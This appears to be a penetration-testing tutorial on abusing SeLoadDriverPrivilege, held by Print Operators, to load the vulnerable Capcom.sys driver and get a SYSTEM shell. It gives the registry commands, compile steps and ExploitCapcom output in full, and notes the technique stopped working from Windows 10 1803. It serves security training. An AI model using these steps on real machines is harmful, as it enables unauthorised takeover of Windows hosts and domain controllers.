Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down. If we issue the command whoami /priv, and don't see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC.
C:\xyz> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ======================== ================================= ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeShutdownPrivilege Shut down the system Disabled
The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line. Alternatively, from a GUI, we can open an administrative command shell and input the credentials of the account that is a member of the Print Operators group. If we examine the privileges again, SeLoadDriverPrivilege is visible but disabled.
C:\xyz> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ================================== ========== SeMachineAccountPrivilege Add workstations to domain Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
The driver Capcom.sys contains functionality to allow any user to execute shellcode with SYSTEM privileges. We can use our privileges to load this vulnerable driver and escalate privileges. We can use this tool to load the driver. The PoC enables the privilege as well as loads the driver for us.
Download it locally and edit it, pasting over the includes below.
include <windows.h> include <assert.h> include <winternl.h> include <sddl.h> include <stdio.h> include "tchar.h"
From a Visual Studio 2019 Developer Command Prompt, compile it using cl.exe.
C:\Users\>cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp Microsoft (R) C/C++ Optimizing Compiler Version 19.28.29913 for x86 Copyright (C) Microsoft Corporation. All rights reserved. EnableSeLoadDriverPrivilege.cpp Microsoft (R) Incremental Linker Version 14.28.29913.0 Copyright (C) Microsoft Corporation. All rights reserved. /out:EnableSeLoadDriverPrivilege.exe EnableSeLoadDriverPrivilege.obj
Download the Capcom.sys driver from here, and save it to C:\temp. Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.
C:\xyz> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" The operation completed successfully. C:\xyz> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 The operation completed successfully.
Using Nirsoft's DriverView.exe, we can verify that the Capcom.sys driver is not loaded.
PS C:\xyz> .\DriverView.exe /stext drivers.txt PS C:\xyz> cat drivers.txt | Select-String -pattern Capcom
Run the EnableSeLoadDriverPrivilege.exe binary.
C:\xyz> EnableSeLoadDriverPrivilege.exe whoami: LEGALCORP0\printsvc whoami /priv SeMachineAccountPrivilege Disabled SeLoadDriverPrivilege Enabled SeShutdownPrivilege Disabled SeChangeNotifyPrivilege Enabled by default SeIncreaseWorkingSetPrivilege Disabled NTSTATUS: 00000000, WinError: 0
Verify that the Capcom driver is now listed.
PS C:\xyz> .\DriverView.exe /stext drivers.txt PS C:\xyz> cat drivers.txt | Select-String -pattern Capcom Driver Name : Capcom.sys Filename : C:\Tools\Capcom.sys
To exploit the Capcom.sys, we can use the ExploitCapcom tool after compiling with it Visual Studio.
PS C:\xyz> .\ExploitCapcom.exe [*] Capcom.sys exploit [*] Capcom.sys handle was obained as 0000000000000070 [*] Shellcode was placed at 0000024822A50008 [+] Shellcode was executed [+] Token stealing was successful [+] The SYSTEM shell was launched
This launches a shell with SYSTEM privileges.
We can use a tool such as EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver:
C:\xyz> EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys [+] Enabling SeLoadDriverPrivilege [+] SeLoadDriverPrivilege Enabled [+] Loading Driver: \Registry\User\S-1-5-21-454284637-3659702366-2958135535-1103\System\CurrentControlSet\Capcom NTSTATUS: c000010e, WinError: 0
We would then run ExploitCapcom.exe to pop a SYSTEM shell or run our custom binary.
Note: Since Windows 10 Version 1803, the "SeLoadDriverPrivilege" is not exploitable, as it is no longer possible to include references to registry keys under "HKEY_CURRENT_USER".